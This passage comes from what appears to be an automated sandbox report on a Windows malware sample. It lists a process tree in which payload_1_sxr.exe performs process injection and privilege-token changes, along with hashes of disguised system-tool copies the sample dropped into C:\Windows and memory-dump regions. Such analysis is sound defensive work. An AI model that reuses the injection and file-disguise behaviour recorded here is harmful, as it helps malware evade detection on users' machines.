                                                        PID:1756
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1920
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:1956
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                            1⤵
                                                              PID:1992
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:2000
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1436
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                  1⤵
                                                                    PID:1652
                                                                  • C:\Windows\System32\spoolsv.exe
                                                                    C:\Windows\System32\spoolsv.exe
                                                                    1⤵
                                                                      PID:2120
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2296
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                        1⤵
                                                                          PID:2308
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2472
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                            1⤵
                                                                              PID:2480
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2624
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                1⤵
                                                                                  PID:2720
                                                                                • C:\Windows\sysmon.exe
                                                                                  C:\Windows\sysmon.exe
                                                                                  1⤵
                                                                                    PID:2772
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                    1⤵
                                                                                      PID:2780
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                      1⤵
                                                                                        PID:2808
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                        1⤵
                                                                                          PID:2816
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                          1⤵
                                                                                            PID:2972
                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                            1⤵
                                                                                              PID:2684
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                              1⤵
                                                                                                PID:3296
                                                                                              • C:\Windows\Explorer.EXE
                                                                                                C:\Windows\Explorer.EXE
                                                                                                1⤵
                                                                                                  PID:3328
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe"
                                                                                                    2⤵
                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • Drops file in Windows directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4644
                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{15efe45d-6aa8-417f-a205-d25b19e62c7a}
                                                                                                      3⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4808
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                  1⤵
                                                                                                    PID:3528
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:3736
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3900
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4152
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:3628
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:4540
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:4764
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                  PID:760
                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                  1⤵
                                                                                                                    PID:3680
                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:528
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                      1⤵
                                                                                                                        PID:1840
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:3180
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                          1⤵
                                                                                                                            PID:1028
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:2616
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:1556
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2152
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                  1⤵
                                                                                                                                    PID:3544
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3016 -ip 3016
                                                                                                                                      2⤵
                                                                                                                                        PID:1768

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0bzslyj.fhb.ps1
                                                                                                                                      Filesize

                                                                                                                                      60B

                                                                                                                                      MD5

                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                      SHA1

                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                      SHA256

                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                      SHA512

                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      Download Submit

                                                                                                                                    • C:\Windows\$sxr-cmd.exe
                                                                                                                                      Filesize

                                                                                                                                      283KB

                                                                                                                                      MD5

                                                                                                                                      8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                      SHA1

                                                                                                                                      f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                      SHA256

                                                                                                                                      b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                      SHA512

                                                                                                                                      99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                      Download Submit

                                                                                                                                    • C:\Windows\$sxr-mshta.exe
                                                                                                                                      Filesize

                                                                                                                                      14KB

                                                                                                                                      MD5

                                                                                                                                      0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                      SHA1

                                                                                                                                      51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                      SHA256

                                                                                                                                      dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                      SHA512

                                                                                                                                      d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                      Download Submit

                                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                                      Filesize

                                                                                                                                      442KB

                                                                                                                                      MD5

                                                                                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                                                                                      SHA1

                                                                                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                      SHA256

                                                                                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                      SHA512

                                                                                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                      Download Submit

                                                                                                                                    • memory/212-81-0x0000000000C40000-0x0000000000C5A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                      Download

                                                                                                                                    • memory/212-76-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                      Download

                                                                                                                                    • memory/212-77-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                      Download

                                                                                                                                    • memory/212-79-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      128KB

                                                                                                                                      Download

                                                                                                                                    • memory/316-90-0x000001E1F6630000-0x000001E1F6657000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      156KB

                                                                                                                                      Download

                                                                                                                                    • memory/316-101-0x00007FFCE5150000-0x00007FFCE5160000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                      Download

                                                                                                                                    • memory/612-99-0x00007FFCE5150000-0x00007FFCE5160000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                      Download

                                                                                                                                    • memory/612-89-0x0000025D20BC0000-0x0000025D20BE7000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      156KB

                                                                                                                                      Download

                                                                                                                                    • memory/612-85-0x0000025D20B90000-0x0000025D20BB2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                      Download

                                                                                                                                    • memory/672-108-0x00007FFCE5150000-0x00007FFCE5160000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                      Download

                                                                                                                                    • memory/672-92-0x000001DFEB9B0000-0x000001DFEB9D7000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      156KB

                                                                                                                                      Download

                                                                                                                                    • memory/2424-83-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      160KB

                                                                                                                                      Download

                                                                                                                                    • memory/2424-72-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      160KB

                                                                                                                                      Download

                                                                                                                                    • memory/2424-74-0x00007FFD250D0000-0x00007FFD252C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      Download

                                                                                                                                    • memory/2424-75-0x00007FFD24140000-0x00007FFD241FE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                      Download

                                                                                                                                    • memory/2424-73-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      160KB

                                                                                                                                      Download

                                                                                                                                    • memory/2520-12-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      16KB

                                                                                                                                      Download

                                                                                                                                    • memory/2520-10-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      16KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-46-0x00007FFD250D0000-0x00007FFD252C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-42-0x0000028D782C0000-0x0000028D78844000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.5MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-44-0x0000028D791F0000-0x0000028D7962E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.2MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-45-0x0000028D79630000-0x0000028D796E2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      712KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-29-0x0000028D77C00000-0x0000028D77C22000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-39-0x0000028D77EF0000-0x0000028D77F14000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      144KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-54-0x0000028D7A090000-0x0000028D7A0E0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      320KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-55-0x0000028D7A1A0000-0x0000028D7A252000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      712KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-56-0x0000028D7A430000-0x0000028D7A5F2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.8MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-66-0x0000028D7A0E0000-0x0000028D7A11C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      240KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-67-0x0000028D79B40000-0x0000028D79B8E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      312KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-68-0x00007FFD250D0000-0x00007FFD252C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-69-0x00007FFD24140000-0x00007FFD241FE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-70-0x0000028D7A120000-0x0000028D7A156000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      216KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-41-0x00007FFD24140000-0x00007FFD241FE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-43-0x0000028D78A20000-0x0000028D791EA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      7.8MB

                                                                                                                                      Download

                                                                                                                                    • memory/3856-40-0x00007FFD250D0000-0x00007FFD252C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-6-0x000001B2023D0000-0x000001B2023F2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-5-0x00007FFD06F60000-0x00007FFD07A21000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-0-0x00007FFD06F63000-0x00007FFD06F65000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-1-0x000001B200000000-0x000001B200A4E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.3MB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-2-0x000001B21AAD0000-0x000001B21AB74000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      656KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-8-0x00007FFD24140000-0x00007FFD241FE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-51-0x00007FFD06F63000-0x00007FFD06F65000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-9-0x000001B2023F0000-0x000001B2023FA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-4-0x000001B21ACA0000-0x000001B21ACF8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      352KB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-71-0x00007FFD06F60000-0x00007FFD07A21000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-7-0x00007FFD250D0000-0x00007FFD252C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      Download

                                                                                                                                    • memory/4644-3-0x000001B21ABF0000-0x000001B21AC46000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      344KB

                                                                                                                                      Download

                                                                                                                                    • memory/4808-13-0x0000000000400000-0x0000000000406000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                      Download

                                                                                                                                    • memory/4808-15-0x0000000000400000-0x0000000000406000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      24KB

                                                                                                                                      Download